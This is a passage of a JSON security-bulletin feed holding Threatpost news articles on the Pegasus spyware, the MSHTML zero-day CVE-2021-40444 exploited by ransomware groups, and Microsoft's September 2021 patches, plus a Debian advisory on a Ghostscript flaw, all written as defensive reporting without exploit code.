narrative, taking the tactic of questioning Citizen Lab\u2019s methods and motives.\n\nBut, as pointed out by Hank Schless, Senior Manager of security solutions at endpoint-to-cloud security company Lookout, the narrative is now pretty threadbare. \u201cThe recent exposure of 50,000 phone numbers linked to targets of NSO Group customers was all people needed to see right through what NSO claims,\u201d he told Threatpost on Monday.\n\n\u201cSince Lookout and The Citizen Lab first discovered Pegasus back in 2016, it has continued to evolve and take on new capabilities,\u201d he elaborated. \u201cIt can now be deployed as a zero-click exploit, which means that the target user doesn\u2019t even have to tap a malicious link for the surveillanceware to be installed.\n\nWhile the malware has adjusted its delivery methods, the basic exploit chain remains the same, Schless continued. \u201cPegasus is delivered via a malicious link that\u2019s been socially engineered to the target, the vulnerability is exploited and the device is compromised, then the malware communicated back to a command-and-control (C2) server that gives the attacker free reign over the device. Many apps will automatically create a preview or cache of links in order to improve the user experience. Pegasus takes advantage of this functionality to silently infect the device.\u201d\n\nSchless said that this is an example of how important it is for both individuals and enterprise organizations to have visibility into the risks their mobile devices present, Pegasus being just onei \u201cextreme, but easily understandable example.\n\n\u201cThere are countless pieces of malware out there that can easily exploit known device and software vulnerabilities to gain access to your most sensitive data,\u201d he continued. \u201cFrom an enterprise perspective, leaving mobile devices out of the greater security strategy can represent a major gap in the ability to protect the entire infrastructure from malicious actors. Once the attacker has control of a mobile device or even compromises the user\u2019s credentials, they have free access to your entire infrastructure. Once they enter your cloud or on-prem apps, they can move laterally and identify sensitive assets to encrypt for a ransomware attack or exfiltrate to sell to the highest bidder.\u201d\n\nKevin Dunne, president at unified access orchestration provider Pathlock, noted that the Pegasus infections point to the need for businesses to look beyond securing servers and workstations as primary targets for cyberattacks and espionage. \u201cMobile devices are now used broadly and contain sensitive information that needs to be protected,\u201d he explained.\n\nTo protect themselves against spyware, businesses should look at their mobile device security strategy, Dunne said \u2013 particularly when threats come in forms that are far more insidious than suspicious SMS messages or phishy links that security teams can train users to avoid.\n\n\u201cSpyware attackers have now engineered zero click attacks which are able to get full access to a phone\u2019s data and microphone/camera by using vulnerabilities in third party apps or even built-in applications,\u201d Dunne said. \u201cOrganizations need to make sure they have control over what applications users download on to their phones, and can ensure they are up to date so any vulnerabilities are patched.\u201d\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. **[**JOIN**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** Threatpost and Cybersixgill for **[**Threat Hunting to Catch Adversaries, Not Just Stop Attacks**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** and get a guided tour of the dark web and learn how to track threat actors before their next attack. **[**REGISTER NOW**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** for the LIVE discussion on September 22 at 2 PM EST with Cybersixgill\u2019s Sumukh Tendulkar and Edan Cohen, along with researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.**\n", "cvss3": {}, "published": "2021-09-13T22:10:15", "type": "threatpost", "title": "Apple Issues Emergency Fix for NSO Zero-Click Zero Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-30860"], "modified": "2021-09-13T22:10:15", "id": "THREATPOST:958AA77BA7D3A5325FEB47A5DE036F1C", "href": "https://threatpost.com/apple-emergency-fix-nso-zero-click-zero-day/169416/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-17T12:16:20", "description": "Criminals behind the Ryuk ransomware were early exploiters of the Windows MSHTML flaw, actively leveraging the bug in campaigns ahead of a patch released by [Microsoft](<https://threatpost.com/microsoft-patch-tuesday-exploited-windows-zero-day/169459/>) this week.\n\nCollaborative research by Microsoft and RiskIQ revealed campaigns by Ryuk threat actors early on that exploited the flaw, tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). The bug is a remote code execution (RCE) vulnerability in Windows that allows attackers to craft malicious Microsoft Office documents. The two [released](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) [separate reports](<https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/>) online this week to provide a look into who has been using the flaw\u2013which can be used to hide a malicious ActiveX control in an Office document\u2013in attacks, as well as their potential connections to known criminal groups.\n\n[![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nSpecifically, most of the attacks that researchers analyzed used MSHTML as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders, which communicated with an infrastructure that is associated with multiple cybercriminal campaigns\u2013including human-operated ransomware, researchers from the Microsoft 365 Defender Threat Intelligence Team at the Microsoft Threat Intelligence Center (MSTIC) reported.\n\nRiskIQ identified the ransomware infrastructure as potentially belonging to the Russian-speaking [Wizard Spider](<https://threatpost.com/wizard-spider-upgrades-ryuk-ransomware/149853/>) crime syndicate, known to maintain and distribute Ryuk ransomware.\n\n\u201cBased on multiple overlapping patterns in network infrastructure setup and use, we assess with high confidence that the operators behind the zero-day campaign are using infrastructure affiliated with Wizard Spider (CrowdStrike), and/or related groups UNC1878 (FireEye/Mandiant) and Ryuk (public), who continue to use Ryuk/Conti and BazaLoader/BazarLoader malware in targeted ransomware campaigns,\u201d RiskIQ\u2019s Team Atlas wrote in its analysis.\n\nMicrosoft stopped short of specifically identifying the threat actors observed exploiting the MSHTML flaw, instead referring to unidentified perpetrators as \u201cdevelopment groups\u201d using the prefix \u201cDEV\u201d and a number to indicate an emerging threat group.\n\n## **Separate Campaigns, Threat Actors**\n\nIn its analysis, the company cites activity from three DEV groups since August that have been seen in attacks leveraging CVE-2021-40444: DEV-0365, DEV-0193 and DEV-0413.\n\nThe infrastructure the company associates with DEV-0365 was used in the Cobalt Strike campaigns and follow-on activity, indicating \u201cmultiple threat actors or clusters associated with human-operated ransomware attacks (including the deployment of Conti ransomware),\u201d according to researchers. However, DEV-0365 potentially may be involved only as a command-and-control infrastructure as a service for cybercriminals, the company said.\n\n\u201cAdditionally, some of the infrastructure that hosted the oleObjects utilized in the August 2021 attacks abusing CVE-2021-40444 were also involved in the delivery of BazaLoader and Trickbot payloads \u2014 activity that overlaps with a group Microsoft tracks as DEV-0193,\u201d the team said.\n\nMicrosoft attributed another campaign using the vulnerability to a group identified as DEV-0413. This campaign is \u201csmaller and more targeted than other malware campaigns we have identified leveraging DEV-0365 infrastructure,\u201d and was observed exploiting the flaw as early as Aug. 18.\n\nThe campaign used a social-engineering lure that aligned with the business operations of targeted organizations, \u201csuggesting a degree of purposeful targeting,\u201d the company observed.\n\n\u201cThe campaign purported to seek a developer for a mobile application, with multiple application development organizations being targeted,\u201d they wrote. \u201cIn most instances, file-sharing services were abused to deliver the CVE-2021-40444-laden lure.\u201d\n\n## **History of a Vulnerability**\n\nMicrosoft first [revealed](<https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/>) the MSHTML zero-day vulnerability on Sept. 7, joining the Cybersecurity and Infrastructure Security Agency (CISA) in warning organizations of the bug and urging mitigations in separate alerts released that day.\n\nThe vulnerability allows an attacker to craft a malicious ActiveX control that can be used by a Microsoft Office document that hosts the browser rendering engine, according to Microsoft. \nSomeone would have to open the malicious document for an attack to be successful, the company said. This is why attackers use email campaigns with lures that appear relevant to their targets in the hopes that they will launch embedded documents, researchers said.\n\nIndeed, at least one of the campaigns Microsoft researchers observed included emails impersonating contracts and legal agreements to try to trick victims to opening the documents to distribute the payload.\n\nThough it\u2019s not completely certain if Wizard Spider is behind some of these early attacks, it\u2019s clear that ransomware operators are interested in exploiting the MSHTML flaw, according to RiskIQ.\n\nHowever, at this point, \u201cwe assume there has been limited deployment of this zero-day,\u201d researchers wrote. That means that even if known ransomware criminals are involved in the attacks, delivering ransomware may not be the ultimate goal of the campaigns, they observed.\n\n\u201cInstead, we assess with medium confidence that the goal of the operators behind the zero-day may, in fact be traditional espionage,\u201d RISKIQ\u2019s Team Atlas wrote. \u201cThis goal could easily be obscured by a ransomware deployment and blend into the current wave of targeted ransomware attacks.\u201d\n\nNo matter, organizations should take advantage of the patch Microsoft released this week for the vulnerability and update their systems now before more attacks occur, the company reiterated. \u201cCustomers are advised to apply the [security patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) for CVE-2021-40444 to fully mitigate this vulnerability,\u201d the MSTIC team wrote.\n\n**Rule #1 of Linux Security: **No cybersecurity solution is viable if you don\u2019t have the basics down. [**JOIN**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the [**4 Golden Rules of Linux Security**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>). Your top takeaway will be a Linux roadmap to getting the basics right! [**REGISTER NOW**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time.\n", "cvss3": {}, "published": "2021-09-17T12:07:59", "type": "threatpost", "title": "Microsoft MSHTML Flaw Exploited by Ryuk Ransomware Gang", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-17T12:07:59", "id": "THREATPOST:3C3F20C93519036CC712D1CA3A6D7C48", "href": "https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-16T18:44:44", "description": "In [September\u2019s Patch Tuesday](<https://msrc.microsoft.com/update-guide/vulnerability>) crop of security fixes, Microsoft released patches for 66 CVEs, three of which are rated critical, and one of which \u2013 the Windows MSHTML zero-day \u2013 has been under active attack for nearly two weeks.\n\nOne other bug is listed as publicly known but isn\u2019t (yet) being exploited. Immersive Labs\u2019 Kevin Breen, director of cyber threat research, observed that with only one CVE under active attack in the wild, it\u2019s \u201cquite a light Patch Tuesday\u201d \u2013 at least on the surface, that is.\n\nThe flaws were found in Microsoft Windows and Windows components, Microsoft Edge (Chromium, iOS, and Android), Azure, Office and Office Components, SharePoint Server, Microsoft Windows DNS and the Windows Subsystem for Linux.\n\n[![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nOf the 66 new CVEs patched today, three are rated critical, 62 are rated important, and one is rated moderate in severity.\n\nOver the past nine months of 2021, this is the seventh month in which Microsoft patched fewer than 100 CVEs, in stark contrast to 2020, when Redmond spent eight months gushing out more than 100 CVE patches per month. But while the overall number of vulnerabilities is lighter, the severity ratings have ticked up, as the [Zero Day Initiative](<https://www.zerodayinitiative.com/blog/2021/9/14/the-september-2021-security-update-review-kpgpb>) noted.\n\nSome observers pegged the top patching priority in this month\u2019s batch as being a fix for CVE-2021-40444: An important-rated vulnerability in Microsoft\u2019s MSHTML (Trident) engine that rates 8.8 out of 10 on the CVSS scale.\n\nDisclosed on Sept. 7, it\u2019s a painfully throbbing sore thumb, given that researchers developed a number of proof-of-concept (PoC) exploits showing how drop-dead simple it is to exploit, and attackers have been sharing guides on how to do just that.\n\n## Under Active Attack: CVE-2021-40444\n\nIt\u2019s been nearly two weeks since this serious, simple to exploit bug has been under active attack, and it\u2019s been nearly a week since attackers started to share blueprints on how to carry out an exploit.\n\nMicrosoft said last week that the flaw could let an attacker \u201ccraft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine,\u201d after which \u201cthe attacker would then have to convince the user to open the malicious document.\u201d Unfortunately, malicious macro attacks continue to be prevalent: In July, for example, legacy users of Microsoft Excel were being targeted in a malware campaign that used a [novel malware-obfuscation technique](<https://threatpost.com/microsoft-office-malware-protection-bypass/167652/>) to disable malicious macro warnings and deliver the ZLoader trojan.\n\nAn attacker would need to convince a user to open a specially crafted Microsoft Office document containing the exploit code.\n\nSatnam Narang, staff research engineer at Tenable, noted via email that there have been warnings that this vulnerability will be incorporated into malware payloads and used to distribute ransomware: A solid reason to put the patch at the top of your priority list.\n\n\u201cThere are no indications that this has happened yet, but with the patch now available, organizations should prioritize updating their systems as soon as possible,\u201d Narang told Threatpost.\n\nLast Wednesday, Sept. 8, [Kevin Beaumont](<https://twitter.com/GossiTheDog/status/1435515875025633282>) \u2013 head of the security operations center for U.K. fashion retailer Arcadia Group and a past senior threat intelligence analyst at Microsoft \u2013 [noted](<https://twitter.com/GossiTheDog/status/1435562870331293706>) that the exploit had been in the wild for about a week or more.\n\nIt got worse: Last Thursday, Sept. 9, threat actors began [sharing exploit how-tos](<https://www.bleepingcomputer.com/news/microsoft/windows-mshtml-zero-day-exploits-shared-on-hacking-forums/>) and PoCs for the Windows MSHTML zero-day. BleepingComputer gave it a try and found that the guides are \u201csimple to follow and [allow] anyone to create their own working version\u201d of the exploit, \u201cincluding a Python server to distribute the malicious documents and CAB files.\u201d\n\nIt took the publication all of 15 minutes to recreate the exploit.\n\nA week ago, on Tuesday, Sept. 7, Microsoft and the Cybersecurity and Infrastructure Security Agency (CISA) had [urged mitigations](<https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/>) of the remote-code execution (RCE) flaw, which is found in all modern Windows operating systems.\n\nLast week, the company didn\u2019t say much about the bug in MSHTML, aka Trident, which is the HTML engine built into Windows since Internet Explorer debuted more than 20 years ago and which allows Windows to read and display HTML files.\n\nMicrosoft did say, however, that it was aware of targeted attacks trying to exploit it via specially crafted Microsoft Office documents.\n\nIn spite of there being no security updates available for the vulnerability at that time, MIcrosoft went ahead and disclosed it, along with mitigations meant to help prevent exploitation.\n\n## Mitigations That Don\u2019t Mitigate\n\nTracked as [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>), the flaw is serious enough that CISA sent its own advisory, alerting users and administrators and recommending that they use the mitigations and workarounds Microsoft recommended \u2013 mitigations that try to prevent exploitation by blocking ActiveX controls and Word/RTF document previews in Windows Explorer.\n\nEmphasis on \u201ctry to:\u201d Unfortunately, those mitigations proved to be less than foolproof, as researchers, including Beaumont, managed to [modify the exploit](<https://twitter.com/GossiTheDog/status/1435570418623070210>) so that it didn\u2019t use ActiveX, [effectively skirting Microsoft\u2019s mitigations](<https://www.bleepingcomputer.com/news/microsoft/windows-mshtml-zero-day-defenses-bypassed-as-new-info-emerges/>).\n\nThe Zero Day Initiative [said that](<https://www.zerodayinitiative.com/blog/2021/9/14/the-september-2021-security-update-review-kpgpb>) for now, the most-effective defense is \u201cto apply the patch and avoid Office docs you aren\u2019t expecting to receive.\u201d\n\nBe sure to carefully review and install [all the needed patches](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) for your setup: There\u2019s a long list of updates for specific platforms, and it\u2019s important not to slather on too thin a layer of protection.\n\nCredit for finding this bug goes to Rick Cole of MSTIC; Bryce Abdo, Dhanesh Kizhakkinan and Genwei Jiang, all from Mandiant; and Haifei Li of EXPMON.\n\n## Baddest Bug Award\n\nThe award for baddest bug \u2013 or at least, the one with the highest severity rating, with a CVSS score of 9.8 \u2013 goes to [CVE-2021-38647](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647>): a critical remote-code execution (RCE) vulnerability in Open Management Infrastructure.\n\n[OMI is an open-source project](<https://github.com/microsoft/omi>) to further the development of a production-quality implementation of the [DMTF CIM/WBEM](<https://www.dmtf.org/standards/cim>) standards.\n\n\u201cThis vulnerability requires no user interaction or privileges, so an attacker can run their code on an affected system just by sending a specially crafted message to an affected system,\u201d the Zero Day Initiatve explained. That makes it high priority: ZDI recommended that OMI users test and deploy this one quickly.\n\n## Yet More PrintNightmare Patches\n\nMicrosoft also patched three elevation of privilege vulnerabilities in Windows Print Spooler ([CVE-2021-38667](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38667>), [CVE-2021-38671](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38671>) and [CVE-2021-40447](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40447>)), all rated important.\n\nThese are the three latest fixes in a steady [stream](<https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/>) of [patches](<https://threatpost.com/microsoft-unpatched-printnightmare-zero-day/168613/>) for flaws in Windows Print Spooler that followed the [disclosure of PrintNightmare](<https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/>) in June. This probably won\u2019t be the last patch in that parade: Tenable\u2019s Narang told Threatpost that \u201cresearchers continue to discover ways to exploit Print Spooler\u201d and that the firm expects \u201ccontinued research in this area.\u201d\n\nOnly one \u2013 CVE-2021-38671 \u2013 of today\u2019s patch trio is rated as \u201cexploitation more likely.\u201d Regardless, organizations should prioritize patching these flaws as \u201cthey are extremely valuable to attackers in post-exploitation scenarios,\u201d Narang observed.\n\n## More \u2018Exploitation More Likely\u2019\n\nImmersive\u2019s Breen told Threatpost that a trio of local privilege-escalation vulnerabilities in the Windows Common Log File System Driver ([CVE-2021-36955](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36955>), [CVE-2021-36963](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36963>), [CVE-2021-38633](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38633>)) are also noteworthy, all of them being listed as \u201cexploitation more likely.\u201d\n\n\u201cLocal priv-esc vulnerabilities are a key component of almost every successful cyberattack, especially for the likes of ransomware operators who abuse this kind of exploit to gain the highest level of access,\u201d Breen said via email. \u201cThis allows them to disable antivirus, delete backups and ensure their encryptors can reach even the most sensitive of files.\u201d\n\nOne glaring example of that emerged in May, when hundreds of millions of [Dell users were found to be at risk](<https://threatpost.com/dell-kernel-privilege-bugs/165843/>) from kernel-privilege bugs. The bugs lurked undisclosed for 12 years, and could have allowed attackers to bypass security products, execute code and pivot to other parts of the network for lateral movement.\n\nThe three exploits Microsoft patched on Tuesday aren\u2019t remote, meaning that attackers need to have achieved code execution by other means. One such way would be via CVE-2021-40444.\n\nTwo other vulnerabilities \u2013 [CVE-2021-38639](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38639>) and [CVE-2021-36975](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36975>), both Win32k escalation of privilege flaws \u2013 have also been listed as \u201cexploitation more likely\u201d and, together, cover the full range of supported Windows versions.\n\nBreen said that he\u2019s starting to feel like a broken record when it comes to privilege escalation vulnerabilities. They\u2019re not rated as high a severity risk as RCE bugs, but \u201cthese local exploits can be the linchpin in the post-exploitation phases of an experienced attacker,\u201d he asserted. \u201cIf you can block them here you have the potential to significantly limit their damage.\u201d\n\nhe added, \u201cIf we assume a determined attacker will be able to infect a victim\u2019s device through social engineering or other techniques, I would argue that patching priv-esc vulnerabilities is even more important than patching some other remote code-execution vulns,\u201d Breen said.\n\n## Still, This RCE Is Pretty Important\n\nDanny Kim, a principal architect at Virsec who spent time at Microsoft during his graduate work on the OS security development team, wants security teams to pay attention to [CVE-2021-36965](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36965>) \u2013 an important-rated Windows WLAN AutoConfig Service RCE vulnerability \u2013 given its combination of severity (with a CVSS:3.0 base score of 8.8); no requirement for privilege escalation/user interaction to exploit; and breadth of affected Windows versions.\n\nThe WLAN AutoConfig Service is part of the mechanism that Windows 10 uses to choose the wireless network a computer will connect to, and to the Windows Scripting Engine, respectively.\n\nThe patch fixes a flaw that could allow network-adjacent attackers to run their code on affected systems at system level.\n\nAs the Zero Day Initiative explained, that means an attacker could \u201ccompletely take over the target \u2013 provided they are on an adjacent network.\u201d That would come in quite handy in a [coffee-shop attack](<https://threatpost.com/microsoft-wi-fi-protection/145053/>), where multiple people use an unsecured Wi-Fi network.\n\nThis one \u201cis especially alarming,\u201d Kim said: Think [SolarWinds](<https://threatpost.com/solarwinds-default-password-access-sales/162327/>) and PrintNightmare.\n\n\u201cAs recent trends have shown, remote code execution-based attacks are the most critical vulnerabilities that can lead to the largest negative impact on an enterprise, as we have seen in the Solarwinds and PrintNightmare attacks,\u201d he said in an email.\n\nKim said that in spite of the exploit code maturity being currently unproven, the vulnerability has been confirmed to exist, leaving an opening for attackers.\n\n\u201cIt specifically relies on the attacker being located in the same network, so it would not be surprising to see this vulnerability used in combination with another CVE/attack to achieve an attacker\u2019s end goal,\u201d he predicted. \u201cRemote code execution attacks can lead to unverified processes running on the server workload, only highlighting the need for constant, deterministic runtime monitoring. Without this protection in place, RCE attacks can lead to a total loss of confidentiality and integrity of an enterprise\u2019s data.\u201d\n\nThe Zero Day Initiative also found this one alarming. Even though it requires proximity to a target, it requires no privileges or user interaction, so \u201cdon\u2019t let the adjacent aspect of this bug diminish the severity,\u201d it said. \u201cDefinitely test and deploy this patch quickly.\u201d\n\n## And Don\u2019t Forget to Patch Chrome\n\nBreen told Threatpost via email that security teams should also pay attention to 25 vulnerabilities patched in Chrome and ported over to Microsoft\u2019s Chromium-based Edge.\n\nBrowsers are, after all, windows into things both private, sensitive and valuable to criminals, he said.\n\n\u201cI cannot underestimate the importance of patching your browsers and keeping them up to date,\u201d he stressed. \u201cAfter all, browsers are the way we interact with the internet and web-based services that contain all sorts of highly sensitive, valuable and private information. Whether you\u2019re thinking about your online banking or the data collected and stored by your organization\u2019s web apps, they could all be exposed by attacks that exploit the browser.\u201d\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. **[**JOIN**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** Threatpost and Cybersixgill for **[**Threat Hunting to Catch Adversaries, Not Just Stop Attacks**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** and get a guided tour of the dark web and learn how to track threat actors before their next attack. **[**REGISTER NOW**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** for the LIVE discussion on September 22 at 2 PM EST with Cybersixgill\u2019s Sumukh Tendulkar and Edan Cohen, along with researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.**\n", "cvss3": {}, "published": "2021-09-14T20:29:14", "type": "threatpost", "title": "Microsoft Patches Actively Exploited Windows Zero-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-36955", "CVE-2021-36963", "CVE-2021-36965", "CVE-2021-36975", "CVE-2021-38633", "CVE-2021-38639", "CVE-2021-38647", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2021-09-14T20:29:14", "id": "THREATPOST:6D61C560E85ECD0A7A35C55E74849510", "href": "https://threatpost.com/microsoft-patch-tuesday-exploited-windows-zero-day/169459/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-08T12:29:02", "description": "Both Microsoft and federal cybersecurity officials are urging organizations to use mitigations to combat a zero-day remote control execution (RCE) vulnerability in Windows that allows attackers to craft malicious Microsoft Office documents.\n\nMicrosoft has not revealed much about the MSHTML bug, tracked as [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>), beyond that it is \u201caware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents,\u201d according to an advisory released Tuesday.\n\nHowever, it\u2019s serious enough that the Cybersecurity and Infrastructure Security Agency (CISA) released [an advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/microsoft-releases-mitigations-and-workarounds-cve-2021-40444>) of its own alerting users and administrators to the vulnerability and recommending that they use the mitigations and workarounds Microsoft recommends.\n\nThe vulnerability allows an attacker to craft a malicious ActiveX control that can be used by a Microsoft Office document that hosts the browser rendering engine, according to Microsoft. \n[![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)The attacker would then have to convince the user to open the malicious document for an attack to be successful, the company said. Moreover, users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights, according to the advisory.\n\n## **Affecting More than Office**\n\nThough Microsoft is still investigating the vulnerability, it could prove to go beyond affecting just Microsoft Office documents due to the ubiquitous use of MSHTML on Windows, warned Jake Williams, co-founder and CTO at incident response firm [BreachQuest](<https://breachquest.com/>).\n\n\u201cIf you\u2019ve ever opened an application that seemingly \u2018magically\u2019 knows your proxy settings, that\u2019s likely because it uses MSHTML under the hood,\u201d he said in an e-mail to Threatpost. \u201cVulnerabilities like these tend to have extremely long lifetimes for exploitation in the wild.\u201d\n\nEven if the vulnerability\u2019s reach does not go beyond Office documents, its presence and the fact that attackers are already trying to exploit are worrisome enough for organizations to take immediate action, noted another security professional.\n\nMalicious Office documents are a popular tactic with cybercriminals and state-sponsored threat actors, and the vulnerability give them \u201cmore direct exploitation of a system and the usual tricking users to disable security controls,\u201d observed John Bambenek, principal threat hunter at digital IT and security operations firm [Netenrich](<https://netenrich.com/>).\n\n\u201cAs this is already being exploited, immediate patching should be done,\u201d he advised. \u201cHowever, this is a stark reminder that in 2021, we still can\u2019t send documents from point A to point B securely.\u201d\n\n## **Mitigations and Workarounds**\n\nMicrosoft has offered some advice for organizations affected by the vulnerability\u2014first discovered by Rick Cole of the Microsoft Security Response Center, Haifei Li of EXPMON, and Dhanesh Kizhakkinan, Bryce Abdo and Genwei Jiang of Mandiant\u2013until it can offer its own security update. That may come in the form of a Patch Tuesday fix or an out-of-band patch, depending on what researchers discover, the company said.\n\nUntil then, customers should keep anti-malware products up to date, though those who use automatic updates don\u2019t need to take action now, Microsoft said. For enterprise customers who manage updates, they should select the detection build 1.349.22.0 or newer and deploy it across their environments, the company added.\n\nWorkarounds for the flaw include disabling the installation of all ActiveX controls in Internet Explorer, which mitigates a potential attack, according to Microsoft.\n\n\u201cThis can be accomplished for all sites by updating the registry,\u201d the company said in its advisory. \u201cPreviously-installed ActiveX controls will continue to run, but do not expose this vulnerability.\u201d\n\nHowever, Microsoft warned organizations to take care when using the Registry Editor, because doing so incorrectly can \u201ccause serious problems that may require you to reinstall your operating system.\u201d \u201cUse Registry Editor at your own risk,\u201d the company advised.\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. **[**JOIN**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** Threatpost and Cybersixgill for **[**Threat Hunting to Catch Adversaries, Not Just Stop Attacks**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** and get a guided tour of the dark web and learn how to track threat actors before their next attack. **[**REGISTER NOW**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** for the LIVE discussion on Sept. 22 at 2 p.m. EST with Cybersixgill\u2019s Sumukh Tendulkar and Edan Cohen, along with independent researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.**\n", "cvss3": {}, "published": "2021-09-08T12:24:51", "type": "threatpost", "title": "Microsoft, CISA Urge Mitigations for Zero-Day RCE Flaw in Windows", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-08T12:24:51", "id": "THREATPOST:62DC935BF4DB4EF8A4F1E83519B1D5CD", "href": "https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/", "cvss": {"score": 0.0, "vector": "NONE"}}], "debian": [{"lastseen": "2021-10-21T18:07:42", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4972-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nSeptember 10, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : ghostscript\nCVE ID : CVE-2021-3781\nDebian Bug : 994011\n\nIt was discovered that Ghostscript, the GPL PostScript/PDF interpreter,\ndoes not properly validate access for the "%pipe%", "%handle%" and\n"%printer%" io devices, which could result in the execution of arbitrary\ncode if a malformed Postscript file is processed (despite the -dSAFER\nsandbox being enabled).\n\nFor the stable distribution (bullseye), this problem has been fixed in\nversion 9.53.3~dfsg-7+deb11u1.\n\nWe recommend that you upgrade your ghostscript packages.\n\nFor the detailed security status of ghostscript please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/ghostscript\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2021-09-10T12:16:01", "type": "debian", "title": "[SECURITY] [DSA 4972-1] ghostscript security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2021-3781"], "modified": "2021-09-10T12:16:01", "id": "DEBIAN:DSA-4972-1:D5274", "href": "https://lists.debian.org/debian-security-announce/2021/msg00157.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-25T14:25:18", 